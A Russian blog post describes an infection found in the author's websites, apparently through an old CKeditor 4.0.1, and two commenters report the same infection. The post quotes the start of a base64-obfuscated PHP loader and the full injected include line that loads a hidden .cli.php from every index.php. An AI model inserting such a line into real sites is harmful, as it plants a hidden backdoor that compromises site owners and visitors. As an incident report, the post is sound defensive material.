Познавательный блог Мобильная врсия

Страницы

Промо

Новые файлы в корне сайта .cli.php или спасибо дырявому Сkeditor

Приехав  с морей я обнаружил в корне всех своих сайтов файл .cli.php. Содержимое файла было закодировано base64

<?php error_reporting(0);
$MTQMzEwNTAxMmE='base64_decode';
$MTQMzEwNTAxMmI=$MTQMzEwNTAxMmE(str_replace("\n", '', и далее куча кода.

В начало каждого файла index.php был добавлен вызывающий код.

<?php error_reporting(0); @include_once( dirname(__FILE__) ."/". urldecode("%2E%63%6C%69%2E%70%68%70"));?>

Заражал все сайты видимо скрипт, видно что работа не ручная. За 15 минут вся лишняя дрянь была удалена, но возник другой вопрос — откуда она появилась? Большая часть сайтов это WP и только пара сайтов клиентских на самопальных движках и DLE. Поскольку DLE и WP я постоянно обновляю подозрения остались на самописный сайт.

И его редактор Сkeditor. Оказалось, что там стояла версия 4.0.1 в которой была обнаружена уязвимость. Скачал свежий Сkeditor, удалил старый и вроде как отпустило. Надеюсь что добрый хакер не оставил нигде запасной шелл.

Комментарии

Комментарий от Paki [ 25 сентября, 2016, 10:52 ]

Аналогичная дрянь появилась на днях. Сайтов у меня тоже несколько на DLE и WP. Через что лезут пока не понятно – Сkeditor у меня не установлен.

Комментарий от Andr [ 6 октября, 2016, 20:13 ]

Аналогичная дрянь. И залезло это походу через какие то дырки у firstvds, на котором я смотрю и у вас расположен сайт.
Причем эти файлы были добавлены и индексовые заменены даже в тех сайтах, которые давным давно не работают и недоступны.

Написать комментарий








Поиск по сайту

Статистика

Мета

  Разработка и дизайн — StvPromo.ru